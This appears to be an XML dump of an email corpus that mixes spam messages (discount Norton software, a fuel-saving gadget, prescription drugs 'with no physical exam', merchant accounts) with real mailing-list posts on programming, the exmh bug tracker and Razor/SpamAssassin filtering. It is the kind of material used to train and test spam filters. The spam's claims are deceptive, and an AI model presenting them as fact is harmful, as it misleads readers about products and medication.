 CjxQIEFMSUdOPSJDRU5URVIiPjxGT05UIENPTE9SPSIjMDAwMEZGIiBmYWNl
 PSJBcmlhbCI+PEI+QVRURU5USU9OOiBUaGlzIGlzIGEgTVVTVCBmb3IgQUxM
 IENvbXB1dGVyIFVzZXJzISEhPEJSPg0KPC9CPjwvRk9OVD48Rk9OVCBDT0xP
 Uj0iIzAwMDAwMCIgZmFjZT0iQXJpYWwiPjxCUj4NCjwvRk9OVD48Rk9OVCBm
 YWNlPSJBcmlhbCI+PEI+Kk5FVy1TcGVjaWFsIFBhY2thZ2UgRGVhbCEqPEJS
 Pg0KPC9CPjwvRk9OVD48Rk9OVCBDT0xPUj0iIzAwMDAwMCIgZmFjZT0iQXJp
 YWwiPjxCUj4NCjwvRk9OVD48Rk9OVCBDT0xPUj0iI0ZGMDAwMCIgZmFjZT0i
 QXJpYWwiPjxCPk5vcnRvbiBTeXN0ZW1Xb3JrcyAyMDAyIFNvZnR3YXJlIFN1
 aXRlIC1Qcm9mZXNzaW9uYWwgRWRpdGlvbi0NCg0KSW5jbHVkZXMgU2l4IC0g
 WWVzIDYhIC0gRmVhdHVyZS1QYWNrZWQgVXRpbGl0aWVzDQpBTEwgRm9yIDEg
 U3BlY2lhbCBMT1cgUHJpY2UhNiBGZWF0dXJlLVBhY2tlZCBVdGlsaXRpZXMu
 Li4xIEdyZWF0IFByaWNlIQ0KQSAkMzAwKyBDb21iaW5lZCBSZXRhaWwgVmFs
 dWUhDQoNCkZSRUUgU2hpcHBpbmchPC9CPjwvRk9OVD48L1A+DQoNCjxQIEFM
 SUdOPSJDRU5URVIiPjxGT05UIENPTE9SPSIjRkYwMDAwIiBmYWNlPSJBcmlh
 bCI+PEI+PEJSPg0KPC9CPjwvRk9OVD48QSBIUkVGPSJodHRwOi8vZXVyby5z
 cGVjaWFsZGlzY291bnRzNHUuY29tLyI+PEZPTlQgZmFjZT0iQXJpYWwiPjxC
 PkNsaWNrIEhlcmUgTm93ITwvQj48L0ZPTlQ+PC9BPg0KDQoNCjwvQk9EWT4N
 Cg0KPC9IVE1MPg0KOTc4MEdVZmQwLTUwM1RDdlI5Mzc0SnJCUTMtOTg5WVVo
 VDU5OGwzNQ==
</t>
  </si>
  <si>
    <t xml:space="preserve">
 schemers are often slagged of for that sort of thing 
 they "know the Value of Everything, Cost of Nothing" 
 did i get that the right way arround ?
 --B
 -----Original Message-----
 From: John P. Looney [mailto:valen@tuatha.org]
 Sent: 08 August 2002 11:38
 To: ilug@linux.ie
 Subject: Re: [ILUG] slashdot EW Dijkstra humor
 On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute mentioned:
 &gt; Interesting. I've always wondered about things 'considered' to be bad. 
 &gt; Example the GOTO, most languages support a goto of some sort, so are gotos
 really bad?
  Yes. Especially in the languages he was talking about - C, Pascal and
 Assembler. Goto's can be used well; there are a few used in the kernel
 code to improve efficency. They are almost required in some languages
 (like C) where 'break' or 'continue' can't be told how many loops/switches
 to break out of.
  But, in general, goto's make a mess of code.
 &gt; Is a loop or a recursive call actually any better than a goto 
 &gt; or is the goto used as a kind of common enemy of 
 &gt; programming syntax
 &gt; to make sure people use loops or recursion?
 &gt; &lt;&lt;To iterate is human, to recurse divine&gt;&gt;
  Recursion is only truely useful if you have an infinite stack. People
 that think they have an infinite stack shouldn't be let near a compiler.
 &gt; Kind of makes you wonder about things considered to be 'good'.  For
 &gt; example people bang on about polymorphism, but is there actually any
 &gt; advantage in using an overloaded function based on class inheritance?
  I don't care, to be honest.
 Kate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</si>
  <si>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Re: PROTECT YOUR COMPUTER,YOU NEED SYSTEMWORKS!    COXR
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"489" height=3D"41" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"35" bgcolor=3D"#000000" align=3D"center"&gt;=
 &lt;font face=3D"Impact" size=3D"3" color=3D"#00FFFF"&gt;Take
       Control of Your Computer With This Top-of-the-Line Software!&lt;/font&gt;&lt;=
 /td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"5" cellspacing=3D"3" width=3D"489" cellpadding=3D"3" bgco=
 lor=3D"#000080"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#000000" height=3D"567" bordercolorlight=3D"#CCCCFF"=
 &gt;
   &lt;tr&gt;
     &lt;td width=3D"467" height=3D"555" bordercolorlight=3D"#FFFFFF" borderco=
 lordark=3D"#FFFF99"&gt;
       &lt;table border=3D"6" width=3D"100%" height=3D"86" bgcolor=3D"#000000"=
  bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" size=3D"6" color=3D"#FFFFFF"&gt;Norton
             SystemWorks 2002&lt;/font&gt;&lt;font color=3D"#FF0000" face=3D"Tahoma"=
  size=3D"6"&gt; &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFF99"&gt; So=
 ftware Suite&lt;/font&gt;&lt;font color=3D"#FF0000" face=3D"Times New Roman" size=3D=
 "6"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;font face=3D"Times New Roman" size=3D"6" color=3D"#CCC=
 CFF"&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" size=3D"4" color=3D"#CCFFFF"&gt;Includes
             Six - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFFFF=
 "&gt;&lt;i&gt;Yes 6!&lt;/i&gt;
             &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#CCFFFF"&gt; 
             - Feature-Packed Utilities&lt;br&gt;ALL for &lt;/font&gt;&lt;font face=3D"Tah=
 oma" size=3D"4" color=3D"#FFFFFF"&gt;1
             Special LOW
             Price of Only
             $29.99!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"135" bgcolor=3D"#000080=
 " bordercolor=3D"#CCCCFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"129" bgcolor=3D"#000000" bordercolo=
 r=3D"#000080"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;font color=3D"#FFFF99"&gt;=
 This
             Software Will:&lt;/font&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;&amp;nbsp;-
             Protect your computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt;  vir=
 uses&lt;br&gt;&amp;nbsp;-
             Help secure your private &amp;amp; valuable information&lt;br&gt;&amp;nbsp;-=
  Allow
             you to transfer files and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;&amp;nbsp=
 ;-
             Backup your ALL your data quick and easily&lt;br&gt;&amp;nbsp;- Improve =
 your
             PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&amp;nbsp;- &lt;i&gt;You'll NEVER have to take =
 your
             PC to the repair shop AGAIN!&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#000000" =
 bordercolor=3D"#CCCCFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D=
 "#FFFFFF"&gt;6&lt;/font&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font color=3D"#00FFFF"=
 &gt;
             Top-of-the-Line &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5"=
  color=3D"#FFFFFF"&gt; Utilities&lt;/font&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font=
  color=3D"#00FFFF"&gt;&lt;font color=3D"#000080" size=3D"5"&gt;&lt;br&gt;&lt;/font&gt;&lt;u&gt;1
             &lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;u&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D=
 "#FFFFFF"&gt;
             Great Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000" size=3D"5"&gt; &lt;fon=
 t size=3D"5" face=3D"Tahoma"&gt;&lt;font color=3D"#00FFFF"&gt; &lt;br&gt;
             A &lt;/font&gt;&lt;/font&gt;
             &lt;/font&gt;
             &lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFFFF"&gt;$300+&lt;/font=
 &gt;&lt;font color=3D"#000000" size=3D"5"&gt; &lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;fon=
 t color=3D"#00FFFF"&gt;
             &lt;/font&gt;&lt;/font&gt;
             &lt;/font&gt;
             &lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFFFF"&gt;  
             Combined Retail Value&lt;/font&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;=
 font color=3D"#00FFFF"&gt;&lt;font color=3D"#000000" size=3D"5"&gt; 
             &lt;/font&gt;
             &lt;i&gt;YOURS&lt;/i&gt;  &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" c=
 olor=3D"#FFFFFF"&gt; for
             a limited time&lt;/font&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font co=
 lor=3D"#00FFFF"&gt;
             for Only !!!&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" col=
 or=3D"#FFFFFF"&gt;$29.99&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#00F=
 FFF"&gt;!!!&lt;/font&gt;&lt;font size=3D"6"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" size=3D"4"&gt;&lt;font color=3D"#00=
 FFFF"&gt;&amp;lt; &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFFFF=
 "&gt;
             Price Includes FREE Shipping! &lt;/font&gt;&lt;font color=3D"#00FFFF"&gt;&lt;=
 font face=3D"Tahoma" size=3D"4"&gt; &amp;gt;&lt;br&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Impac=
 t" size=3D"4" color=3D"#CCFFFF"&gt;And
             For a Limited time Buy 2 of Our Products &amp;amp; Get 1 Free!&lt;/fo=
 nt&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Tahoma" size=3D"3" color=3D"#FFF=
 FFF"&gt;Don't fall
     prey to destructive viruses or hackers!&lt;br&gt;Protect&amp;nbsp; your computer=
  and
     your valuable information and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 FFF" bgcolor=3D"#000080"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#FFFFFF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;a href=3D"http://61.151.247.39/erik/" style=3D"color: #FF0000; f=
 ont-family: Verdana; font-size: 14pt; font-weight: bold"&gt;&lt;font face=3D"Tah=
 oma" size=3D"4" color=3D"#0000FF"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#F=
 FFFFF"&gt;or Call
       Toll-Free 1-800-861-1481!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D"Tahom=
 a"&gt;Your email
       address was obtained from an opt-in list. Opt-in EAF (Ecommerce Anti=
 -Spam
       Federation) Approved List - Type UPC Prefix =3D YY*wud02FLUS.&amp;nbsp;T=
 o
       unsubscribe from this list, please &lt;a style=3D"COLOR: #ffffcc" href=3D=
 "http://61.151.247.39/erik/remove.asp"&gt;Click
       here&lt;/a&gt; . You need to allow 5 Business days for removal. If you hav=
 e previously unsubscribed and are still receiving
       this message, you may visit our &lt;a style=3D"COLOR: #ffffcc" href=3D"=
 http://61.151.247.39/erik/abuse.asp"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Professional dog poop scooper has 300 customers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8406747,1717/
 Date: 2002-09-30T20:19:10+01:00
 (charlotte.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: scan bug: no update after Pick's "New FTOC"
</t>
  </si>
  <si>
    <t xml:space="preserve">If you run Pick, and then use the "New FTOC" button to show only
 those messages selected by pick, then the ftoc display was considered
 "invalid" in the old code.  This prevented the display from being cached,
 and it meant that you could get back to the full folder display by
 clicking on the folder lablel.  That doesn't work anymore.  You have
 to resort to Rescan Folder.  In fact, when you change folders you
 continue to have the Pick results, not the new folder contents.
 If you go to a any folder and do Rescan, then it heals itself.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</si>
  <si>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Subject: Spend less gas per mile on your car this Summer...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;table border="3" width="83%" height="186" cellspacing="4" cellpadding="4" bordercolor="#000080"&gt;
   &lt;tr&gt;&lt;td width="100%" height="1" colspan="2" bgcolor="#FFFF00"&gt;
       &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" face="Arial Black"&gt;&lt;img border="0" src="http://81.9.8.40/images/nozzle.jpg" align="left"&gt;&lt;/font&gt;&lt;/b&gt;&lt;p align="center"&gt;&amp;nbsp;&lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" face="Arial Black"&gt;Increase
       Your Gas Mileage&lt;/font&gt;&lt;font size="5" face="Arial Black"&gt;&lt;br&gt;by up to 27%
       !!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
     &lt;td width="55%" height="99"&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;* No TOOLS
       required!&amp;nbsp;&lt;br&gt;* Improves Power&lt;img border="0" src="http://81.9.8.40/images/f-350d.gif" align="right" width="125" height="67"&gt;&lt;br&gt;* Maximizes Energy&lt;br&gt;
       * Improves Mileage&amp;nbsp;&lt;br&gt;* Improves Torque&amp;nbsp;&lt;br&gt;
       * Cleaner Engine&amp;nbsp;&lt;br&gt;* Smoother Engine&amp;nbsp;&lt;br&gt;
       * Reduces Emissions by 43%&amp;nbsp;&lt;br&gt;* Protects Catalytic Converters&amp;nbsp;&lt;br&gt;* Prevents Diesel Gelling&amp;nbsp;&lt;br&gt;
       * Improves Spark Plug Life&amp;nbsp;&lt;br&gt;* Maintenance Free&lt;br&gt;* Pays for Itself within 60 days!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="45%" height="99"&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font size="4"&gt;&lt;u&gt;Installs
       in Seconds!&lt;/u&gt;&lt;/font&gt;&lt;br&gt;&lt;font size="3"&gt;A simple device that easily snaps over your fuel line.&lt;/font&gt;&amp;nbsp; Anyone can do it!&lt;br&gt;
       &lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;font size="4" face="Arial"&gt;&lt;b&gt;&lt;u&gt;Guaranteed&lt;/u&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;u&gt;!&lt;/u&gt;&lt;/font&gt;&lt;br&gt;
       &lt;font size="3"&gt;FULL REFUND if you are not satisfied with the result within THREE MONTHS from the date of purchase.&lt;/font&gt;&lt;/b&gt;
       &lt;/font&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;font face="Arial" size="3"&gt;&lt;b&gt;&lt;a href="http://81.9.8.40/cgi-bin/fuelmax/index.cgi?1035"&gt;CLICK
       HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
     &lt;td width="100%" height="99" colspan="2"&gt;
 &lt;p align="center"&gt;&lt;font size="1"&gt;&lt;font face="arial, helvetica"&gt;HOW TO
 UNSUBSCRIBE:&lt;br&gt;
 You received this e-mail because you are registered at one of our Web sites, or
 on one of our partners' sites.&lt;br&gt;
 &amp;nbsp;If you do not want to receive partner e-mail offers, or any email
 marketing from us please &lt;/font&gt;&lt;a href="http://81.9.8.40/cgi-bin/fuelmax/index.cgi?1040#remove" target="_blank"&gt;click
 here.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
  [^3247(^(PO1:KJ)_8J7BJ]
</t>
  </si>
  <si>
    <t xml:space="preserve">In message &lt;200210091925.g99JPGfJ001534@fsck.intern.waldner.priv.at&gt;, Robert 
 Wa
 ldner said:
 &gt; 
 &gt; 
 &gt; On Wed, 09 Oct 2002 14:43:32 EDT, Kevin Kenny writes:
 &gt; &gt;&gt; 3)  You can learn to use procmail,
 &gt; 
 &gt; &gt;Can this be done via .forward?
 &gt; 
 &gt; make your .forward contain only the following line:
 &gt; "|/usr/bin/procmail"
 &gt;  (incl. the quotes, your procmail binary may be in another path)
 &gt; 
 Check the procmail documentation.  They actually recommend:
 "|IFS=' '&amp;&amp;p=(PATH/TO/PROCMAIL)&amp;&amp;test -f $p&amp;&amp;exec $p -f-||exit 
 75#(UNIQUE_STRING)"
 I don't know what this does, but it is explained in the doc.
 -- 
 Jim McMaster
 mailto:mcmasjc@tatanka.stortek.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Phentermine,Xenical,Viagra
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Edrugsource.com&lt;/title&gt;
 &lt;/head&gt;
 &lt;body vlink=darkblue&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;We offer the Absolute Lowest prices on Viagra and other 
 FDA-approved medications.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;Medication prescribed by licensed U.S. Physicians and 
 shipped via overnight delivery. &lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;Free Medical Consultation Available 24 hours... 7 Days a 
 week! &lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;No Physical Exam Necessary. &lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;Featured Products Available for immediate delivery at 
 &lt;/FONT&gt;&lt;FONT face=Tahoma size=2&gt;&lt;A href="http://www.edrugsource.com" target="_blank"&gt;&lt;FONT 
 color=blue&gt;Edrugsource.com&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;include:&lt;/FONT&gt;&lt;/P&gt;
 &lt;UL&gt;
   &lt;LI&gt;&lt;FONT size=2&gt;&lt;STRONG&gt;&lt;FONT face=Tahoma&gt;Viagra&lt;/FONT&gt; &lt;/STRONG&gt;&lt;/FONT&gt;
   &lt;LI&gt;&lt;FONT size=2&gt;&lt;STRONG&gt;&lt;FONT face=Tahoma&gt;Phentermine&lt;/FONT&gt; &lt;/STRONG&gt;&lt;/FONT&gt;
   &lt;LI&gt;&lt;FONT size=2&gt;&lt;STRONG&gt;&lt;FONT face=Tahoma&gt;Celebrex&lt;/FONT&gt; &lt;/STRONG&gt;&lt;/FONT&gt;
   &lt;LI&gt;&lt;FONT size=2&gt;&lt;STRONG&gt;&lt;FONT face=Tahoma&gt;Xenical&lt;/FONT&gt; &lt;/STRONG&gt;&lt;/FONT&gt;
   &lt;LI&gt;&lt;FONT face=Tahoma size=2 
  &gt;&lt;STRONG&gt;Plus Much More!&lt;/STRONG&gt;  &lt;/FONT&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;P&gt;&lt;FONT color=darkblue&gt;&lt;STRONG&gt;&lt;A href="http://www.edrugsource.com" target="_blank"&gt;Weight Loss - Sexual 
 Health - Skin Care - Pain Relief- Stop Smoking &lt;/A&gt;     
         &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;Visit  Edrugsource.com for a discrete, safe and secure 
 experience.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;A href="http://www.edrugsource.com" target="_blank"&gt;&lt;FONT face=Tahoma size=2 color=blue&gt;CLICK HERE 
 &lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Tahoma size=2&gt;to see what we have!!!&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;
 &lt;br&gt;&lt;FONT face=Tahoma size=2&gt;To be excluded from our mailing 
 list, &lt;/FONT&gt;
        &lt;A href="mailto:removeme99@btamail.net.cn?subject=REMOVE NOW"&gt;&lt;FONT 
 size=2&gt;&lt;FONT 
 face=Tahoma&gt;CLICK HERE&lt;/FONT&gt; &lt;/FONT&gt; &lt;/A&gt;&lt;FONT face=Tahoma size=2&gt;.  You will then be automatically deleted from future mailings.
 &lt;br&gt;
 ============================================================================= 
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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 [Razor-users] Using razor with maildrop
</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff--
 What is the maildrop recipe you use with spamassassin?  I was trying to
 set mine up but I am running into a few difficulties.
 I think I will try spamassassin first and see how it goes, and then
 perhaps fold in razor2... is it easy to fold in?
 Sunil
 &gt;
 &gt; Here is my recipe for Maildrop:
 &gt;
 &gt; # Vipul's Razor check
 &gt; #
 &gt; log `/usr/bin/razor-check`
 &gt; log "razor-check = $RETURNCODE"
 &gt; if ( $RETURNCODE == 0 )
 &gt; {
 &gt;   xfilter "reformail -a'X-Razor: SPAM'"
 &gt;   log "SPAM caught by Vipul's Razor"
 &gt;   to "$FOLDERS/.SPAM/"
 &gt; }
 &gt;
 &gt; I used this with Razor version 1.  I'm not sure if it was ever used with
 &gt; Razor2.  I am now using SpamAssassin w/ Razor2.  You may wish to remove
 &gt; the log statements once running.
 &gt;
 &gt; I use both.  SpamAssassin (SA) catches things that Razor does not.
 &gt; There were enough false positives with Razor that I do not trust it
 &gt; alone. After whitelisting all the newsletters I receive, SA w/ Razor2
 &gt; does a very good job.
 &gt;
 &gt; HTH,
 &gt;   Jeffrey
 &gt;
 &gt;
 &gt; Quoting Sunil William Savkar &lt;sunil@inthespace.com&gt;:
 &gt;&gt; Hi.
 &gt;&gt;
 &gt;&gt; I just finished installing and getting running maildrop with my
 &gt;&gt; virtual users.  I was thinking to set up razor with maildrop as my
 &gt;&gt; first test of its filtering capabilities..
 &gt;&gt;
 &gt;&gt; I have seen documentation out there for procmail, but is there similar
 &gt;&gt; documentation for integrating maildrop with razor?
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Separately, it looks like many people use spamassassin with razor.  If
 &gt;&gt; I am using razor2, is there still an advantage to this?
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Thanks in advance.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Sunil
 &gt;&gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt;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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: E-Business                                         [c2971]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 HOW TO SUBSTANTIALLY INCREASE SALES:
 Easily accept major credit cards right away!
 ===========================================
 Submit the following via email to receive more information.
 Or vist our online submition
 http://utenti.tripod.it/aha7666
 NAME:
 PHONENUMBER:
 AND BEST TIME TO CALL:
 ===========================================
 Merchant Status will help you increase sales by an
 incredible 50% to 100%. Stop losing valuable sales!
 With one phone call you can be:
 Accepting all major credit cards!
 Accepting checks over the net or by Fax!
 Accepting real time processing for member sites!
 Gaining custumer loyalty and trust!
 Close the sale now. No more wondering if "The check
 is in the mail"
 We specialize in helping businesses who
 are just starting out with no credit, poor credit, or
 even if you have great credit.
 Almost everyone is approved!
 ===========================================
 Submit the following via email to receive more information.
 NAME:
 PHONENUMBER:
 AND BEST TIME TO CALL:
 ===========================================
 To be taken off the list type remove in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi part message in MIME format.
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 ........... with our telecoms partner Bumblebee !
 Don't get ripped off by expensive hotel, payphone and mobile charges. 
 SAVE, SAVE, SAVE on international calls with Ryanair's phone partner. 
 ************************************************************************
 *********
 You'll save up to 70% on international phone calls when you use our 
 online phone card.  You can use the card from any phone in any country 
 you visit and you won't have to worry about high phone charges 
 when you call home or the office.
 Buying a card couldn't be easier and it's totally secure.  Simply go to
 http://www.bumblebeecommunications.com/lowcostcalls/  
  to avail of this special offer for Ryanair customers.
 It's another great deal from Ryanair and our online phone 
 partner, Bumblebee Communications. 
 =====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it 
 are confidential and may be legally privileged. They are intended 
 solely for the use of the intended recipient.  Any views and 
 opinions expressed are those of the individual author/sender 
 and are not necessarily shared or endorsed by Ryanair Holdings plc 
 or any associated or related company. In particular e-mail 
 transmissions are not binding for the purposes of forming 
 a contract to sell airline seats, directly or via promotions, 
 and do not form a contractual obligation of any type.   
 Such contracts can only be formed in writing by post or fax, 
 duly signed by a senior company executive, subject to approval 
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted 
 with it may have been changed or altered without the consent 
 of the author.  If you are not the intended recipient of this e-mail, 
 you are hereby notified that any review, dissemination, disclosure, 
 alteration, printing, circulation or transmission of, or any 
 action taken or omitted in reliance on this e-mail or any file 
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error 
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.  
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV
 Content-Type: application/ms-tnef
 Content-Transfer-Encoding: base64
 eJ8+IjUQAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
 b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAJwAAAFNhdmUgdXAgdG8gNzAlIG9u
 IGludGVybmF0aW9uYWwgY2FsbHMhACgNAQWAAwAOAAAA0gcIAB4AEQAqADQABQBzAQEggAMADgAA
 ANIHCAAeABEAKgA0AAUAcwEBCYABACEAAAAxNUNDQzU1M0ZCNjVGOTRCODJBOTE2NjI0QjY5ODI2
 NAAgBwEDkAYAYAgAADEAAAALAAIAAQAAAAMAJgAAAAAAAwA2AAAAAABAADkAOHxzSERQwgEeAD0A
 AQAAAAEAAAAAAAAAAgFHAAEAAAAyAAAAYz11czthPSA7cD1SeWFuYWlyO2w9Q0hPVk1BSUwxLTAy
 MDgzMDE2NDI1MlotNTY1NgAAAB4AcAABAAAAJwAAAFNhdmUgdXAgdG8gNzAlIG9uIGludGVybmF0
 aW9uYWwgY2FsbHMhAAACAXEAAQAAABYAAAABwlBESGNVR3XMDo5JP7LazaO6pGd8AAAeABoMAQAA
 AAwAAABDb3lsZSwgU2VhbgAeAB0OAQAAACcAAABTYXZlIHVwIHRvIDcwJSBvbiBpbnRlcm5hdGlv
 bmFsIGNhbGxzIQAAAgEJEAEAAAC7AgAAtwIAALsEAABMWkZ1TPw4mgMACgByY3BnMTI14jIDQ3Rl
 eAVBAQMB908KgAKkA+MCAGNoCsBz8GV0MCAHEwKAD/MAUH8EVghVB7IRxQ5RAwEQxzL3BgAGwxHF
